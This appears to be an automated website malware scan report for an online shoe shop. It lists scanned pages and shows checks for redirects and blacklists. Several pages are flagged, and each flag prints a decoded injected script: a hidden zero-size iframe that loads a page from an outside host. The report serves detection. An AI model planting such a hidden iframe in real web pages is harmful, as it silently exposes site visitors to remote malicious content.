Scanned pages/files
Request | Server response | Status |
http://www.xn--djrs37l.com/ | 200 OK Content-Length: 109561 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe>
http://www.xn--djrs37l.com/js/common.js | 200 OK Content-Length: 29050 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/themes/SportsShoes/js/action.js | 200 OK Content-Length: 4662 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/transport.js | 200 OK Content-Length: 22507 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/utils.js | 200 OK Content-Length: 4297 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/data/flashdata/default/cycle_image.js | 200 OK Content-Length: 1351 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/index.php | 200 OK Content-Length: 109561 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe>
http://www.xn--djrs37l.com/flow.php | 200 OK Content-Length: 53912 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe>
http://www.xn--djrs37l.com/js/shopping_flow.js | 200 OK Content-Length: 13652 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/showdiv.js | 200 OK Content-Length: 2479 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/user.php | 200 OK Content-Length: 53441 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe>
http://www.xn--djrs37l.com/js/user.js | 200 OK Content-Length: 18304 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/pick_out.php | 200 OK Content-Length: 267144 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe>
http://www.xn--djrs37l.com/js/lefttime.js | 200 OK Content-Length: 3261 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--djrs37l.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--djrs37l.com
Referer: http://www.google.com/search?q=xn--djrs37l.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--djrs37l.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--djrs37l.com/
Result: xn--djrs37l.com is not infected or malware details are not published yet.